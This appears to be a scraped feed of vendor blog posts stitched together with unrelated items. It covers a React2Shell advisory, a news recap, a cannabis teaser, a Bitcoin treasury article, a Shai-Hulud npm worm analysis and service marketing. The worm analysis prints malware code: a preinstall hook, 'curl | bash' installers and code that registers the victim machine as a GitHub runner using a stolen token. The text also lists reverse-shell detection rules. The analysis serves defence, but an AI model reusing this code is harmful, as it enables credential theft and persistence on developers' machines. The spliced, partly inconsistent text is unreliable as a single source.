A critical remote code execution (RCE) vulnerability, dubbed ‘React2Shell’, affecting React Server Components (RSC) and Next.js, is allowing unauthenticated attackers to perform server-side code attacks via malicious HTTP requests.

Discovered by Lachlan Davidson, the flaw stems from insecure deserialization in the RSC ‘Flight’ protocol and impacts packages including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Exploitation is highly reliable, even in default deployments, and a single request can compromise the full Node.js process. The flaw is being tracked as CVE-2025-55182. Originally tagged as a CVE for Next.js, NIST subsequently rejected  CVE-2025-66478, as it is a duplicate of CVE-2025-55182.

This blog post includes the critical, immediate actions recommended to secure your environment, new and existing Platform Detection Rules designed to defend against this vulnerability, and information on how SentinelOne Offensive Security Engine, a core component of  the Singularity Cloud Security solution, allows our customers to quickly identify potentially vulnerable workloads.

What is React2Shell? Background & Impact

On December 3, 2025, the React and Next.js teams disclosed two related vulnerabilities in the React Server Components (RSC) Flight protocol: CVE-2025-55182 (React) and CVE-2025-66478 (Next.js), with the latter CVE now marked by NIST as a duplicate.

• React announcement
• Next.js announcement

Both enable unauthenticated RCE, impacting applications that use RSC directly or through popular frameworks such as Next.js. These vulnerabilities are rated critical (CVSS 10.0) because exploitation requires only a crafted HTTP request. No authentication, user action, or developer-added server code is needed for an attacker to gain control of the underlying Node.js process.

The vulnerability exists because RSC payloads are deserialized without proper validation, exposing server functions to attacker-controlled inputs. Since many modern frameworks enable RSC as part of their default build, some teams may be exposed without being aware that server-side RSC logic is active in their environment.

Security testing currently shows:

• Exploitation can succeed with near 100% reliability
• Default configurations are exploitable, including a standard Next.js app created with create-next-app and deployed with no code changes
• Applications may expose RSC endpoints even without custom server functions
• A single malicious request can escalate to full Node.js process compromise

Security researchers warn that cloud environments and server-side applications using default React or Next.js builds are particularly at risk. Exploitation could allow attackers to gain full control over servers, access sensitive data, and compromise application functionality. Reports have already emerged of China-nexus threat groups “racing to weaponize” the flaw.

Available Vendor Mitigations & Immediate Actions

Fixes are available in React 19.0, 19.1.0, 19.1.1, and 19.2.0, and Next.js 5.x, Next.js 16.x, Next.js 14.3.0-canary.77 and later canary releases. Administrators are urged to audit environments and update affected packages immediately.

Companies are advised to review deployments, restrict unnecessary server-side exposure, and monitor logs for anomalous RSC requests. Securing default configurations, validating deserialized input, and maintaining a regular patch management schedule can prevent attackers from exploiting framework-level vulnerabilities in production applications.

1. Update React by installing the patched versions of React as listed above.
2. Update Next.js and other RSC-enabled frameworks as listed above. Ensure the latest framework and bundler releases are installed so they ship the patched React server bundles.
3. Review deployment behavior by checking whether your organization’s workloads expose RSC server function endpoints. These may exist regardless of whether developers added custom server functions.

How SentinelOne Protects Our Customers

Cloud Native Security – Offensive Security Engine

SentinelOne’s Offensive Security Engine (OSE), core component of its Singularity Cloud Security solution, proactively distinguishes between theoretical risks and actual threats by simulating an attacker’s methodology. Rather than relying solely on static scans that flag every potential misconfiguration or vulnerability, this engine automatically conducts safe, harmless simulations against your cloud infrastructure to validate exploitability.

This approach delivers differentiated outcomes by radically reducing alert fatigue and focusing security teams on immediate, confirmed dangers. By providing concrete evidence of exploitability—such as screenshots or code snippets of the successful simulation—it eliminates the need for manual validation and “red teaming” of every alert. Shift from chasing hypothetical vulnerabilities to remediating verified attack vectors, ensuring resources are always deployed against the risks that pose a genuine threat to their environment.

In response to this vulnerability, SentinelOne released a new OSE plugin which can verify exploitability of these vulnerabilities for publicly accessible workloads using a defanged (i.e., harmless) HTTP payload.

Viewing Misconfigurations in the SentinelOne Console

SentinelOne customers can quickly identify potentially vulnerable workloads using the Misconfigurations page in the SentinelOne Console.

This highlights Node.js workloads that are exposing RSC-related server function endpoints. Once identified, affected assets can be patched or temporarily isolated. SentinelOne CNS also detects suspicious Node.js behavior associated with exploitation attempts, providing protection while updates are deployed.

It identifies verified exploitable paths on your publicly exposed assets, confirming which systems are truly at risk. By validating exploitability rather than simply flagging theoretical vulnerabilities, Singularity Cloud Security minimizes noise and provides concrete evidence so security teams can focus on what matters.

Wayfinder Threat Hunting

The Wayfinder Threat Hunting team is proactively hunting for this emerging threat by leveraging comprehensive threat intelligence. This includes, but is not limited to, indicators and tradecraft associated with known active groups such as Earth Lamia and Jackpot Panda.

Our current operational coverage includes:

• Atomic IOC Hunting: We have updated our atomic IOC library to include known infrastructure and indicators from these threat actors, as well as broader intelligence regarding this campaign.
• Behavioral Hunting: We are actively building and executing hunts designed to detect behavioral TTP matches that identify suspicious activity beyond static indicators.

Notification & Response All identified true positive findings will generate alerts within the console for the affected sites. For clients with MDR, the MDR team will actively review these alerts and manage further escalation as required.

Platform Detection Rules

SentinelOne’s products provide a variety of detections for potential malicious follow-on reverse shell behaviors and other actions which may follow this exploit. As of December 5, 2025, SentinelOne released new Platform Detection Rules specifically to detect observed in-the-wild exploit activity. We recommend customers apply the latest detection rule, Potential Exploitation via Insecure Deserialization of React Server Components (RSC), urgently to ensure maximum protection.

Additionally, SentinelOne recommends customers verify the following existing rules have also been enabled:

• Potential Reverse Shell via Shell Processes
• Potential Reverse Shell via Node
• Potential Reverse Shell via Python
• Reverse Shell via Perl Utility
• Potential Reverse Shell via AWK Utility
• Potential Reverse Shell via GDB Utility
• Potential Reverse Shell via Lua Utility
• Potential Reverse Shell via Netcat
• Potential Reverse Shell using Ruby Utility
• Potential Reverse Shell via Socat Utility

Conclusion

CVE-2025-55182 and CVE-2025-66478 represent critical risks within the React Server Components Flight protocol. Because frameworks like Next.js enable RSC by default, many environments may be exposed even without intentional server-side configuration. Updating React, updating dependent frameworks, and verifying whether RSC endpoints exist in your organization’s workloads are essential steps.

Singularity Cloud Security helps organizations reduce risk by identifying vulnerable workloads, flagging misconfigurations, and detecting malicious Node.js behavior linked to RCE exploitation. This provides immediate visibility and defense while patches are applied.

Learn more about SentinelOne’s Cloud Security portfolio here or book a demo with our expert team today.

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

The Good | Authorities Jail WiFi Hacker, Seize €1.3B Crypto Mixer & Charge Two Malicious Insiders

An Australian national has received just over seven years in prison for running “evil twin” WiFi networks on various flights and airports to steal travelers’ data. Using a ‘WiFi Pineapple’ device as an access point, he cloned legitimate airport SSIDs. Users were then redirected to phishing sites where he harvested their credentials, which were exploited to access women’s accounts and obtain intimate content. Investigators found thousands of images, stolen credentials, and fraudulent WiFi pages. The individual has since pleaded guilty to multiple cybercrime, theft, and evidence-destruction charges.

In Europe, Swiss and German authorities have dismantled the Cryptomixer service, which allegedly laundered over €1.3 billion in Bitcoin since 2016. As part of Operation Olympia, officials seized three servers, 12 TB of data, Tor .onion domains, and €24 million in Bitcoin, with support from Europol and Eurojust. Cryptomixer, accessible on both the clear and dark web as a hybrid mixing service, obscured blockchain transactions for ransomware operators, dark markets, and a variety of criminal groups.

U.S. prosecutors have charged Virginia twin brothers for allegedly conspiring to steal sensitive government data and destroy databases after being fired as federal contractors. Previously sentenced in 2015 for unauthorized access to State Department systems, they returned to contracting roles before facing these latest indictments for fraud, identity theft, and record destruction. The Justice Department says one brother deleted 96 government databases in February 2025, stole IRS and EEOC data, and abused AI for guidance on how to hide evidence. Both men now face lengthy federal penalties if convicted.

The Bad | Investigation Exposes Contagious Interview Remote Worker & Identity Theft Scheme

In a collaborative investigation, researchers have exposed a persistent North Korean infiltration scheme linked to Operation Contagious Interview (aka UNC5267). The researchers observed in real time adversary operators using sandboxed laptops, revealing tactics designed to embed North Korean IT workers in Western companies, especially those within STEM and finance industries.

Livestreaming from a #Lazarus laptop farm.

For the first time ever, we recorded DPRK’s Famous Chollima full attack cycle: interviews, internal chats, every tool they use and every single click they made. Get ready for tons of raw footage.

Full article via ANYRUN. pic.twitter.com/2fyTn3zLI6

— Mauro Eldritch (@MauroEldritch) December 4, 2025

The operation began when a researcher posed as a U.S. developer targeted by a Contagious Interview recruiter. The attacker attempted to hire the fake developer, requesting full access to their SSN, ID, Gmail, LinkedIn, and 24/7 laptop availability. Virtual machines mimicking real developer laptops where deployed, allowing the researchers to monitor every action without alerting the operators.

The sandbox sessions showed a lightweight but effective toolkit focused on identity theft and remote access rather than malware deployment. Operators were also seen using AI-driven job tools to auto-fill applications and generate interview answers, browser-based OTP generators to bypass MFA, and Google Remote Desktop for persistent control. Reconnaissance commands validated the environment, while connections routed through Astrill VPN matched known Contagious Interview infrastructure. In one session, an operator explicitly requested ID, SSN, and banking details, confirming the goal of full identity and workstation takeover.

The investigation highlights remote hiring as a quiet yet reliable entry point for identity-based attacks. Once inside, attackers can access sensitive dashboards, critical business data, and manager-level accounts. Companies can reduce risk by raising internal awareness and providing safe channels for employees to report suspicious requests, helping prevent infiltration before it escalates into internal compromise.

The Ugly | Researchers Warn of Critical React2Shell RCE Vulnerability in React and Next.js

A critical remote code execution (RCE) vulnerability, dubbed ‘React2Shell’, affecting React Server Components (RSC) and Next.js, is allowing unauthenticated attackers to perform server-side code via malicious HTTP requests.

Discovered by Lachlan Davidson, the flaw stems from insecure deserialization in the RSC ‘Flight’ protocol and impacts packages including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Versions affected include React 19.0 to 19.2.0 and Next.js experimental canary releases 14.3.0 to 16.x below patched versions. Exploitation is highly reliable, even in default deployments, and a single request can compromise the full Node.js process.

The flaw is being tracked as CVE-2025-55182. The technically correct CVE-2025-66478 has now been marked as a duplicate.

The vulnerability exists because RSC payloads are deserialized without proper validation, exposing server functions to attacker-controlled inputs. Modern frameworks often enable RSC by default, leaving developers unknowingly exposed. Fixes are available in React React 19.0, 19.1.0, 19.1.1, and 19.2.0, and Next.js 15.0.5–16.0.7. Administrators are urged to audit environments and update affected packages immediately.

Security researchers warn that cloud environments and server-side applications using default React or Next.js builds are particularly at risk. Exploitation could allow attackers to gain full control over servers, access sensitive data, and compromise application functionality. Reports have already emerged of China-nexus threat groups “racing to weaponize” the flaw.

China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)
December 4, 2025, Amazon Web Services
aws.amazon.com/blogs/securi…
@awscloud.bsky.social

[image or embed]

— 780th Military Intelligence Brigade (Cyber) (@780thmibdecyber.bsky.social) 5 December 2025 at 11:32

Companies are advised to review deployments, restrict unnecessary server-side exposure, and monitor logs for anomalous RSC requests. Securing default configurations, validating deserialized input, and maintaining a regular patch management schedule can prevent attackers from exploiting framework-level vulnerabilities in production applications. SentinelOne’s blog post on the React2Shell RCE flaw can be found here.

Cannabis operators are staring down a confusing policy landscape. To find profit, they'll need to navigate it until it changes.

Can risky operators push marijuana interstate commerce forward? is a post from: MJBizDaily: Financial, Legal & Cannabusiness news for cannabis entrepreneurs

Bitocin treasury companies continue to accumulate a significant amount of BTC despite current market conditions and now control around 5% of the total BTC supply. These companies are led by Michael Saylor’s Strategy and Metaplanet, which have recently raised fresh capital to buy the dip. 

Bitcoin Treasury Companies Now Hold Over 1 Million In BTC

Bitcoin Treasuries data shows that the top 100 public Bitcoin treasury companies currently hold 1,058,929 BTC, while all public companies combined hold 1,061,697. Notably, Strategy is the largest public Bitcoin holder with 650,000 BTC. Michael Saylor’s company yesterday announced another 130 BTC purchase for $11.7 million. 

Meanwhile, the second-largest Bitcoin treasury company is BTC miner MARA holdings, which holds 53,250 BTC. Tether-backed Twenty One Capital, Metaplanet, and Bitcoin Standard Treasury Company complete the top 5, with 43,514, 30,823, and 30,021 BTC, respectively. Meanwhile, companies like Coinbase, Bullish, and Trump Media are among the top 10 largest BTC treasury companies. 

It is worth noting that these public companies account for only a part of the Bitcoin treasuries. Further data from Bitcoin Treasuries shows that there is currently 4 million BTC in treasuries as a whole, including the coins held by governments, private companies, exchanges, DeFi platforms, and ETFs.  

BlackRock is currently the second-largest Bitcoin holder, only behind Satoshi Nakamoto. Strategy is third on the list, while Binance and the U.S. government complete the top 5, with BTC holdings of 628,868 and 323,588, respectively. The 4 million BTC held by these treasury companies as a group accounts for 19% of the total Bitcoin supply. 

Bitcoin treasury companies such as Strategy and Metaplanet have raised new capital amid the recent crash to buy more BTC. Saylor’s company recently raised $836 million from its STRE offering, which it used to buy 8,178 BTC. Meanwhile, Metaplanet raised $130 million to expand its BTC treasury. 

More Companies Set To Adopt Bitcoin

More Bitcoin treasury companies are set to emerge as $10 trillion asset manager, Vanguard, will start offering BTC ETFs from today. Notably, some companies gain BTC exposure through these ETFs rather than buying Bitcoin directly. On-chain analytics platform Arkham Intelligence revealed that the largest U.S. bank, JPMorgan, holds $300 million worth of BlackRock’s BTC ETF. 

Meanwhile, it is worth mentioning that Bitcoin treasuries such as Strategy are coming under immense pressure amid the current market downtrend. Strategy’s CEO, Phong Le, admitted that they might have to sell Bitcoin as a last resort to fund dividend payments if their mNAV drops below 1x and they can no longer raise capital. 

At the time of writing, the Bitcoin price is trading at around $87,000, up in the last 24 hours, according to data from CoinMarketCap.

Shai-Hulud Worm 2.0 is a major escalation of the NPM supply chain attack, now executing in the preinstall phase to harvest credentials across AWS, Azure, and GCP and establish persistence via GitHub Actions.

The following SentinelOne Flash Report was sent to all SentinelOne customers and partners on Tuesday, November 25, 2025. It includes an in-depth analysis of the new variant’s tactics, our real-time detection posture, and the critical, immediate actions required to secure your environment.

Sha1-Hulud: The Second Coming

Key Takeaways

• A new wave of compromised NPM packages is leading to wide-scale supply chain attacks.
• This attack shows additional capabilities compared to previous attacks.
• Victims should immediately change their tokens and secrets, including those associated with any affected cloud environment.

Technical Details

Overview

“Sha1-Hulud” is the name of an ongoing NPM supply chain attack which started as early as November 21, 2025 according to public information. The new attack is similar to the previous “Shai Hulud”, but includes additional features and is triggered by different compromised packages. The name of the new attack comes from the malware author’s description inside the GitHub repository with the exfiltrated data:

While the attacks share similarities, the new attack is slightly different from the previous one and it is not yet known if both attacks come from the same threat actor.

The current attacks have impacted several popular packages such as:

• Postman
• Zapier
• AsyncAPI

A comprehensive list of affected packages can be found here.

Execution & Persistence

Unlike the previous attack, which used “postinstall” to trigger the malware execution, the “Sha1-Hulud” attack utilizes “preinstall” to execute the malware:

...

"scripts": {

"preinstall": "node setup_bun.js"

}

...

}

The malware downloads the legitimate “bun” tool to orchestrate the current attack:

async function downloadAndSetupBun() {

try {

let command;

if (process.platform === 'win32') {

// Windows: Use PowerShell script

command = 'powershell -c "irm bun.sh/install.ps1|iex"';

} else {

// Linux/macOS: Use curl + bash script

command = 'curl -fsSL https://bun.sh/install | bash';

}

…

const environmentScript = path.join(__dirname, 'bun_environment.js');

if (fs.existsSync(environmentScript)) {

runExecutable(bunExecutable, [environmentScript]);

} else {

process.exit(0);

}

The file “bun_environment.js” is an obfuscated JavaScript malware being added to the compromised packages in the “Sha1-Hulud” attack.

This script creates additional files such as “cloud.json”, “contents.json”, “environment.json”, and “truffleSecrets.json” for exfiltration and “discussion.yaml” for persistence.

The payload then registers the infected machine as a self-hosted runner named “SHA1HULUD”:

let _0x449178 = await this.octokit.request("POST /repos/{owner}/{repo}/actions/runners/registration-token", {

'owner': _0x349291,

'repo': _0x2b1a39

});

if (_0x449178.status == 0xc9) {

let _0x1489ec = _0x449178.data.token;

if (a0_0x5a88b3.platform() === 'linux') {

await Bun.$`mkdir -p $HOME/.dev-env/`;

await Bun.$`curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");

await Bun.$`RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`rm actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");

Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();

} else {

if (a0_0x5a88b3.platform() === "win32") {

await Bun.$`powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-win-x64-2.330.0.zip -OutFile actions-runner-win-x64-2.330.0.zip"`.cwd(a0_0x5a88b3.homedir());

await Bun.$`powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"actions-runner-win-x64-2.330.0.zip\", \".\")"`.cwd(a0_0x5a88b3.homedir());

await Bun.$`./config.cmd --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir()).quiet();

Bun.spawn(["powershell", '-ExecutionPolicy', "Bypass", "-Command", "Start-Process -WindowStyle Hidden -FilePath \"./run.cmd\""], {

'cwd': a0_0x5a88b3.homedir()

}).unref();

} else {

if (a0_0x5a88b3.platform() === "darwin") {

await Bun.$`mkdir -p $HOME/.dev-env/`;

await Bun.$`curl -o actions-runner-osx-arm64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`tar xzf ./actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");

await Bun.$`./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`rm actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + '/.dev-env');

Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();

}

}

}

For persistence, the malware adds a workflow called “.github/workflows/discussion.yaml” that contains an injection vulnerability, allowing the threat actor to write a specially crafted message in the repository discussions section. Subsequently, the message executes code on the infected host registered as a runner.

Impact & Objectives

Unlike previous attacks that only targeted the software development environment, this attack also steals AWS, GCP, and Azure secrets that could allow the threat actor to move laterally across the cloud environment. Such information is saved to the “cloud.json” file:

The base64 in Fig. 3 translates to the following:

{"aws":{"secrets":[]},"gcp":{"secrets":[]},"azure":{"secrets":[]}}

The creation of the file does not necessarily mean that the cloud secrets have been stolen as the config can be empty.

The threat actor is also using Trufflehog in this new attack to steal secrets related to the development environment such as GitHub and NPM secrets and tokens – a similar tactic seen in the previous “Shai-Hulud” attack.

While the exact motives of the attackers are currently unknown, successful infection is resulting not only in the theft of intellectual property and private code, but also cloud secrets that could allow a broader breach across a cloud environment. The persistence capabilities allow the threat actor to execute malicious code on the infected host, which is an asset within the development environment of the victim.

SentinelOne Detection Capabilities

Endpoint Protection (EPP)

SentinelOne EPP behavioral AI engines continuously monitor for suspicious activities associated with supply chain attacks and worm propagation, including:

• Execution of malicious scripts and packages
• Unauthorized file modifications in CI/CD workflows
• Privilege escalation and credential abuse
• Suspicious runtime installations and network-based script execution

Platform Detection Rules

The SentinelOne Platform Detection Library includes rules to detect Shai-Hulud worm activity across multiple attack stages:

• Potential Malicious NPM Package Execution – Detects execution of known malicious npm packages used by Shai-Hulud
• Shai-Hulud Worm Workflow File Write Activity – Identifies unauthorized modifications to GitHub Actions workflows and malicious payload deployment
• Shai-Hulud Bun Runtime Installation via Network Fetch – Catches suspicious Bun runtime installations via remote script execution
• Shai-Hulud Unattended GitHub Runner Registration – Detects automated registration of self-hosted GitHub runners with malicious characteristics

Threat Hunting

The Wayfinder Threat Hunting team is proactively hunting, leveraging threat intelligence associated with this emerging threat. If any suspicious activity is identified in your environment, we will notify your organization’s designated escalation contacts immediately.

Recommendations

Wayfinder Threat Hunting provides the following recommendations for immediate action and strategic mitigation:

1. Enable the relevant Platform Detection Rules from the section above.
2. Enable Agent Live Security Update for real-time updates.
3. Remove and replace compromised packages.
4. Pin package versions where possible.
5. Disable npm postinstall scripts in CI where possible.
6. Revoke and regenerate npm tokens, GitHub secrets, SSH keys, and cloud provider credentials.
7. Enforce hardware-based MFA for developer and CI/CD accounts.

Tactical Tools for HuntOps

IOCs (Indicators of Compromise)

Hunting Queries

Query 1: SHA1HULUD Runner Execution

dataSource.name = 'SentinelOne' and event.type = 'Process Creation' and src.process.cmdline contains '--name SHA1HULUD' and src.process.cmdline contains '--unattended --token '

Query 2: SHA1HULUD Malicious JS

dataSource.name = 'SentinelOne' AND tgt.file.sha1 in ("3d7570d14d34b0ba137d502f042b27b0f37a59fa","d60ec97eea19fffb4809bc35b91033b52490ca11","8de87cf4fbdd1b490991a1ceb9c1198013d268c2","f37c6179739cf47e60280dd78cb1a86fd86a2dcf","91429fbfef99fa52b6386d666e859707a07844b2","ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc") and src.process.name contains 'node'

Query 3: Suspicious “bun_environment.js” Files Potentially Linked to SHA1HULUD

dataSource.name = 'SentinelOne' AND tgt.file.size>7000000 AND (tgt.file.path contains '/bun_environment.js' or tgt.file.path contains '\\bun_environment.js') AND !(tgt.file.sha1 in ("3d7570d14d34b0ba137d502f042b27b0f37a59fa","d60ec97eea19fffb4809bc35b91033b52490ca11","8de87cf4fbdd1b490991a1ceb9c1198013d268c2","f37c6179739cf47e60280dd78cb1a86fd86a2dcf","91429fbfef99fa52b6386d666e859707a07844b2","ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc"))

This is an era defined by relentless pressure on cybersecurity professionals. As environments and attack surfaces have expanded, endpoint, cloud, identity, and now AI signals continue to pile up faster than teams can interpret them. Meanwhile, rapidly evolving TTPs, fueled by ransomware-as-a-service (RaaS) and other off-the-shelf tooling have enabled motivated threat actors to move with the sophistication and speed of the most advanced nation state adversaries.

With defenders stretched thin, actors are using these advanced techniques to hide behind operational noise. And, while handling alert fatigue isn’t enough, even mature teams can struggle to confront advanced persistent threats, especially those that specialize in evasion and long-term access.

Addressing these new realities requires reimagining defenses – new strategies to unify signals, eliminate the noise, augment human capacity, and truly prepare for incidents long before they happen. This requires more than just better tools. It requires a full shift in how detection and response is delivered.

That shift is SentinelOne’s Wayfinder Threat Detection and Response (Wayfinder TDR), now generally available (GA).

Our Ethos | Defense Through AI, Intelligence & Human Experts

Wayfinder TDR is built on a foundational belief: True cyber resilience emerges from the fusion of AI, intelligence, and world-class human expertise – not from any single component in isolation.

Modern adversaries evolve too quickly, hide too effectively, and move too fluidly for traditional service models to keep up. Automated systems can miss subtle behaviors and human teams alone cannot keep pace with the scale of telemetry, meaning generic threat feeds are no longer the right solution. True defense requires three pillars working in concert.

Intelligence provides the early warning – timely, curated, contextual insight into an attacker’s behavior and tactics. SentinelOne integrates Google Threat Intelligence (GTI), one of the most powerful and comprehensive intelligence sources in the world, directly into every part of Wayfinder. It delivers a level of global threat visibility previously available only to a small set of elite organizations. This data is combined with our SentinelOne intelligence for an unparalleled set of threat content previously unseen in cybersecurity.

AI then transforms that intelligence and raw telemetry into actionable outcomes. SentinelOne’s industry-leading Purple AI engine automates triage, accelerates investigation, enriches findings with context, and closes the gap between detection and action. AI allows Wayfinder experts to cut through overwhelming volumes of data and surface what actually matters to the operation.

Finally, human expertise applies the experience and ingenuity to understand and act on what’s uncovered. Across 16 countries, SentinelOne’s team of threat hunters, analysts, incident responders, and strategic advisors bring decades of hands-on experience with the world’s most sophisticated adversaries. This combined knowledge closes gaps that machines alone cannot see, validating ambiguous signals and guiding customers through moments of uncertainty with clarity and confidence.

Wayfinder deepens this philosophy by combining elite human expertise with agentic, AI-powered threat hunting and investigations. This multi-layered human and AI model brings a level of defense that neither humans nor machines can achieve alone. We believe that the future of AI security is one that elevates – rather than replaces – human defenders, arming them with the speed of automation and the insights of global intelligence.

Our Portfolio | Tailored Protection & Elite Expertise

Wayfinder Threat Detection & Response is a unified portfolio designed to meet organizations where they are. From automated hunting and 24/7/365 MDR to high-touch advisory services during crises, each Wayfinder offering can either stand alone, or bring a comprehensive and adaptive defense program together.

These services deliver end-to-end coverage across preparation, detection, investigation, response, and recovery, ensuring customers are supported through every phase of the threat lifecycle.

Wayfinder Threat Hunting

Threat hunting is the foundation of the portfolio, delivering always-on, fully automated hunts powered by GT, SentinelOne’s threat intelligence, and enriched by SentinelOne experts. It continuously scans customer environments for emerging attacker infrastructure, high-confidence indicators of compromise, and evolving techniques.

Wayfinder Threat Hunting is unique in that it requires no manual tuning, no scheduled queries, and no analyst scripting. Intelligence updates stream directly into the system and are matched against customer telemetry with contextual attribution – threat actor, campaign, and MITRE mapping all included. Findings immediately feed into MDR workflows for rapid investigation and response.

This eliminates blind spots that attackers rely on and brings dynamic, intelligence-led coverage to every organization, regardless of staffing or maturity level.

Wayfinder MDR Essentials

MDR Essentials delivers enterprise-grade, always-on XDR coverage across endpoints, cloud environments, identity providers, and supported partner services. It provides continuous monitoring, triage, investigation, and response, powered by SentinelOne analysts, AI-driven inference, and threat hunting insights. Using curated intelligence from both SentinelOne’s AI-driven alerting and triage and Google Threat Intelligence, get rapid insight and protection at scale.

MDR Essentials is built for organizations that want strong, immediate defense without operational complexity. Onboarding and activation are simple and swift while coverage is unified through the Singularity Platform. Customers benefit from 24/7 protection, rapid containment, and detailed guidance without needing to expand internal teams.

With MDR Essentials, organizations finally get the confidence that cyber experts are watching every signal, every hour, across every critical surface.

Wayfinder MDR Elite

Wayfinder MDR Elite extends the Essentials experience with a premium, high-touch operating model for organizations that are looking for deeper partnership, strategic alignment, and more proactive readiness and response. Every MDR Elite customer receives a dedicated Threat Advisor, an expert who becomes embedded in their security program, and offers hands-on guidance, operational reviews, and tailored risk management recommendations.

Elite also provides bundled access to SentinelOne’s DFIR specialists, enabling advanced investigations, malware analysis, and targeted forensics. As well, Elite customers receive a built-in Incident Readiness & Response (IRR) retainer, ensuring they have pre-approved hours available for compromise assessments, breach simulations, preparedness workshops, and expert counsel during major incidents.

For teams that want not just coverage but clarity, Elite becomes a trusted extension of their leadership and decision-making process.

Wayfinder Incident Readiness & Response

Wayfinder IRR creates a foundation of preparedness that many organizations simply do not have today. With a renewable pool of hours, customers can proactively strengthen their posture or engage experts during high-pressure moments.

The key to this offering is flexibility. Use those hours to get immediate, 24/7/365 access to elite DFIR specialists that respond effectively and compliantly to critical incidents. Or use hours for breach readiness exercises and compromise assessments to uncover hidden risks and improve your security posture and readiness.

Wayfinder IRR experts act as a trusted partner who can guide organizations through high-pressure moments before, during, and after a breach to build confidence, clarity, and resilience. Expert-led exercises, simulations, and advisory services will transform theoretical security plans into reliable, tested incident response capabilities. And when incidents do occur, our team will not only contain, investigate, and stop the breach in its tracks, but will reconstruct attacker activity to understand the “how” and “what” of an incident, identifying compromised accounts, exfiltrated data, and affected systems.

Wayfinder Emergency Response

For organizations experiencing an active breach without a retainer in place, Wayfinder Emergency Response provides urgent access to a 40-hour block of DFIR expertise. It enables rapid containment, adversary eviction, hands-on investigation, and guidance during critical situations.

Our experts’ deep platform expertise speeds investigations and delivers critical evaluations such as rapid Root Cause Analysis, malware reverse engineering, IOC analysis, and more. With Wayfinder Emergency Response, achieve complete incident control with rapid threat containment, root cause analysis, and privileged, counsel-driven investigative support with defensible reporting. This ensures that all organizations have an expert-led lifeline supported by AI-driven analysis and Google-enhanced intelligence during the most critical moments.

Our Vision | Redefining Managed Services for the AI Era

For years, organizations have been forced to choose between generic intelligence feeds, siloed MDR services, and incomplete incident response retainers. These make for complex in-house responsibilities since point solutions only offer bolt-ons rather than cohesive strategies. AI was under utilized. Human expertise was expensive, inconsistent, or inaccessible. We set out to eliminate the fragmentation that leaves so many organizations exposed.

SentinelOne’s Wayfinder TDR services break that cycle by unifying agentic AI, elite human operators, and unmatched threat intelligence insights into a single, adaptive defense fabric. The result? A portfolio that not only responds to threats but proactively seeks them out, contextualizes them, and then empowers organizations to act with precision and speed.

It stands alone in merging together the deep integration of GTI, operational automation driven by AI, and the global scale of human expertise. Instead of stitching together disparate solutions, Wayfinder is purpose-built to streamline telemetry, intelligence, and human insight into a coherent defense program.

This shift matters as modern adversaries are no longer linear nor predictable – they’re fluid. They adapt rapidly. And, they exploit operational complexity. To reduce that complexity, Wayfinder closes detection gaps and reduces the noise while ensuring that experts are available before, during, and after any incident.

This is a fundamental redefinition of what managed security can achieve when human ingenuity and agentic AI move in sync. Aligning intelligence, technology, and human judgment in a single adaptive defense, Wayfinder raises the bar for what true managed security must deliver.

Conclusion | Proactive & Scalable Defense Starts Now

The future of cybersecurity belongs to organizations that can see farther ahead, move faster, and act with confidence. Attackers are only becoming more automated and opportunistic, meaning SOCs need more than tools – they need a combination of the right intelligence translated by trusted experts and partnership when incidents arise.

As announced at OneCon 2025, Wayfinder joins human expertise, agentic AI, and Google Threat Intelligence to deliver a multi-layered human + AI defense model that helps customers fill in their skill gaps, elevate teams, and strengthen their posture immediately.

Wayfinder TDR is the next evolution of SentinelOne’s services portfolio, combining threat hunting, managed detection, and incident response into a force multiplier to empower organizations in regaining control and reducing daily risk.

Shift the advantage back to the defending side with Wayfinder – watch an overview here and book a demo to get started.

Every major technology revolution begins the same way: Promise, panic, and potential.

The internet gave us connection. Cloud gave us scale. AI is giving us cognition – systems that can reason, decide, and act.

Firewalls helped the internet era. Workload protection helped the cloud era. And, in the AI era, you have AI Security.

This is a new field and frontier that requires mastering two disciplines at once.

• Security for AI – Governing and protecting the usage of AI itself. Models, data, agents, and the users and developers who rely on them. In many cases, this is also done by AI.
• AI for Security – Applying agentic AI and machine learning to solve today’s biggest cybersecurity challenge: Staying ahead of AI-powered attacks by detecting, investigating, and responding at machine speed.

